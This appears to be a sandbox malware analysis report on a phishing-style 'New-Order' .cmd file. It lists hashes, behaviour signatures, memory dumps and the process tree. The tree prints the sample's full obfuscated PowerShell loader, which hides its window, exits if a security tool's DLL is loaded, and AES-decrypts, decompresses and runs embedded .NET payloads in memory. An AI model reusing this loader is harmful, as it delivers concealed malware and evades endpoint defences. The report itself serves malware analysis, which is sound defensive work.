7b1e1f3473b95af2a11df5693cb39b09a20800fd0daf066698cd327ed946db8b

Analysis

max time kernel
17s
max time network
17s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
09-08-2024 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd
Size

67KB
MD5

25927e296d192c57b87be2b7c08b9217
SHA1

a87d3ee507f615fbdd785beab75834de6ca8278a
SHA256

ac9a63cffda7c69820207e8f51ed0a0d24f77d5f81600ccd56406790ca6f5c83
SHA512

4c3606a2868f2ea0ddbc4a450614ccbd3f6a8bd649e6a797e8dbcab2e679bdbf2024f6722012431f9687109670a98e9b2e7d878e30fa0372a3531bf2ea3bbd97
SSDEEP

1536:tXUTAKUXpetG7GvuGSERPZSnw22B1Tkn0v:tETvUXpI/GuH2BM

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2260	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2416 wrote to memory of 2512	2416	cmd.exe	30
PID 2416 wrote to memory of 2512	2416	cmd.exe	30
PID 2416 wrote to memory of 2512	2416	cmd.exe	30
PID 2416 wrote to memory of 2260	2416	cmd.exe	31
PID 2416 wrote to memory of 2260	2416	cmd.exe	31
PID 2416 wrote to memory of 2260	2416	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd';$fqwe='ReaABYRdLABYRinABYResABYR'.Replace('ABYR', ''),'Snkxapnkxalitnkxa'.Replace('nkxa', ''),'EleokkrmeokkrntAokkrtokkr'.Replace('okkr', ''),'EECoHntECoHrECoHyPoECoHiECoHnECoHtECoH'.Replace('ECoH', ''),'GtwLSettwLSCutwLSrtwLSretwLSntwLSttwLSPrtwLSocetwLSsstwLS'.Replace('twLS', ''),'TVMDwrVMDwaVMDwnsVMDwforVMDwmFiVMDwnaVMDwlBlVMDwocVMDwkVMDw'.Replace('VMDw', ''),'IpWzDnvpWzDopWzDkpWzDepWzD'.Replace('pWzD', ''),'FrJxKhomBJxKhaJxKhseJxKh64SJxKhtJxKhriJxKhnJxKhgJxKh'.Replace('JxKh', ''),'Loiohfadiohf'.Replace('iohf', ''),'DeZgWdcoZgWdmpZgWdrZgWdeZgWdsZgWdsZgWd'.Replace('ZgWd', ''),'ChautuynutuygeEutuyxutuyteutuynsiutuyoutuynutuy'.Replace('utuy', ''),'MaMBRyiMBRynMMBRyoduMBRyleMBRy'.Replace('MBRy', ''),'CraUNKeaaUNKtaUNKeDaUNKecaUNKraUNKypaUNKtoaUNKraUNK'.Replace('aUNK', ''),'CXDFCoXDFCpXDFCyToXDFC'.Replace('XDFC', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($fqwe[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function RyEJM($bZGlf){$dAgOT=[System.Security.Cryptography.Aes]::Create();$dAgOT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dAgOT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dAgOT.Key=[System.Convert]::($fqwe[7])('hgNXz1fD3vm3S5F/rkSDGMdYKv7gk2P2ZQChO5e/6Co=');$dAgOT.IV=[System.Convert]::($fqwe[7])('Md9mUVXJ/X1tjxSRFOzmPA==');$lxUOE=$dAgOT.($fqwe[12])();$vusSA=$lxUOE.($fqwe[5])($bZGlf,0,$bZGlf.Length);$lxUOE.Dispose();$dAgOT.Dispose();$vusSA;}function cACUf($bZGlf){$rDMwq=New-Object System.IO.MemoryStream(,$bZGlf);$HiJuv=New-Object System.IO.MemoryStream;$Iropi=New-Object System.IO.Compression.GZipStream($rDMwq,[IO.Compression.CompressionMode]::($fqwe[9]));$Iropi.($fqwe[13])($HiJuv);$Iropi.Dispose();$rDMwq.Dispose();$HiJuv.Dispose();$HiJuv.ToArray();}$KEDOk=[System.IO.File]::($fqwe[0])([Console]::Title);$FSBau=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 5).Substring(2))));$AbKCR=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 6).Substring(2))));[System.Reflection.Assembly]::($fqwe[8])([byte[]]$AbKCR).($fqwe[3]).($fqwe[6])($null,$null);[System.Reflection.Assembly]::($fqwe[8])([byte[]]$FSBau).($fqwe[3]).($fqwe[6])($null,$null); "
  2⤵
  PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2260

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2260-4-0x000007FEF644E000-0x000007FEF644F000-memory.dmp

Filesize
4KB

Download
memory/2260-5-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2260-6-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download
memory/2260-7-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-8-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-9-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-10-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-11-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-12-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

Filesize
9.6MB

Download